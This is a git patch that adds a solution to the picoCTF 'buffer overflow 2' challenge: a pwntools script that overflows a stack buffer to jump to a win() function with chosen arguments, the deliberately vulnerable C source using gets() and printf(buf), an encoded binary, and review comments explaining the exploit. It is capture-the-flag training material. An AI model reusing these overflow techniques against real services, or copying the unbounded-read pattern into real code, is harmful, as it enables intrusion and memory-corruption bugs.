From c56300256d0bcc30547e07d9a1eacf821697461d Mon Sep 17 00:00:00 2001
From: h7x4 
Date: Tue, 3 Sep 2024 19:46:13 +0200
Subject: [PATCH] pwn/buffer_overflow_2
---
 pwn/buffer_overflow_2/solve.py | 31 ++++++++++++++++++++++++
 pwn/buffer_overflow_2/vuln | Bin 0 -> 15808 bytes
 pwn/buffer_overflow_2/vuln.c | 43 +++++++++++++++++++++++++++++++++
 3 files changed, 74 insertions(+)
 create mode 100755 pwn/buffer_overflow_2/solve.py
 create mode 100755 pwn/buffer_overflow_2/vuln
 create mode 100644 pwn/buffer_overflow_2/vuln.c
diff --git a/pwn/buffer_overflow_2/solve.py b/pwn/buffer_overflow_2/solve.py
new file mode 100755
index 0000000..b3dab5e
--- /dev/null
+++ b/pwn/buffer_overflow_2/solve.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -p python3 -i python3 python3Packages.pwntools
+
+from pwn import *
+
+exe = ELF("./vuln")
+
+context.binary = exe
+
+ADDR, PORT, *_ = "saturn.picoctf.net 55214".split()
+
+def conn():
+ if args.REMOTE:
+ r = remote(ADDR, PORT)
+ else:
+ r = process([exe.path])
+
+ return r
+
+def main():
+ r = conn()
+
+ print(r.recvuntil(b"Please enter your string:"))
+ offset = 112 # found with pwndbg
+ payload = b'A' * offset + p32(exe.sym.win) + b'B'*4 + p32(0xCAFEF00D) + p32(0xF00DF00D)
+ r.sendline(payload)
+ print(r.recvall())
+ r.close()
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
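Review bot: The payload built in `main()` hard-codes `offset = 112` and a 32-bit cdecl frame layout (saved return address overwritten with `win`, a 4-byte fake return address, then the two arguments), but nothing verifies that `./vuln` is actually a non-PIE i386 binary, so a rebuilt or relinked challenge binary would fail with an opaque crash instead of a clear message. Adding `assert exe.bits == 32 and not exe.pie, "payload layout assumes a non-PIE i386 binary"` right after `context.binary = exe` makes the assumption explicit, and the offset commented as "found with pwndbg" can be derived at run time from a local crash with `cyclic()`/`cyclic_find()` rather than kept as a constant. `r.recvall()` is called with no timeout, so if the remote service does not close the connection after `win` returns into `0x42424242` the script hangs; `print(r.recvall(timeout=5))` bounds the wait. `r.close()` is only reached on the success path, so a `try`/`finally` around the send/receive would avoid leaking the process or socket when `recvuntil` raises.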
diff --git a/pwn/buffer_overflow_2/vuln b/pwn/buffer_overflow_2/vuln new file mode 100755 index 0000000000000000000000000000000000000000..accb967c62baf9a39e56548a7ce13c01279497fa GIT binary patch literal 15808 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 z +#include +#include +#include +#include + +#define BUFSIZE 100 +#define FLAGSIZE 64 + +void win(unsigned int arg1, unsigned int arg2) { + char buf[FLAGSIZE]; + FILE *f = fopen("flag.txt","r"); + if (f == NULL) { + printf("%s %s", "Please create 'flag.txt' in this directory with your", + "own debugging flag.\n"); + exit(0); + } + + fgets(buf,FLAGSIZE,f); + if (arg1 != 0xCAFEF00D) + return; + if (arg2 != 0xF00DF00D) + return; + printf(buf); +} + +void vuln(){ + char buf[BUFSIZE]; + gets(buf); + puts(buf); +} + +int main(int argc, char **argv){ + setvbuf(stdout, NULL, _IONBF, 0); + + gid_t gid = getegid(); + setresgid(gid, gid, gid); + + puts("Please enter your string: "); + vuln(); + return 0; +} +
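Review bot: vuln.c carries no comment saying it is the vendored challenge source rather than code written for this repository, so a reader may take `gets(buf)` in `vuln()` and `printf(buf)` in `win()` for oversights to fix instead of the intended bugs; the `saturn.picoctf.net` host in solve.py suggests it is the unmodified picoCTF handout, but that is an inference. A header comment such as `/* picoCTF "buffer overflow 2" challenge source, kept verbatim for reference. Intentionally vulnerable; do not "fix". */` would settle that for future readers. For the record of what the exploit relies on: `gets(buf)` is an unbounded read into the 100-byte stack buffer declared with `BUFSIZE`, which is what solve.py overflows to reach `win`, while `printf(buf)` passes the flag file contents as a format string, the `fgets` return value is unchecked, and the `FILE *` from `fopen` is never closed. The `#include` targets and the `@@` header for this hunk did not survive extraction, so the include list above is incomplete as shown.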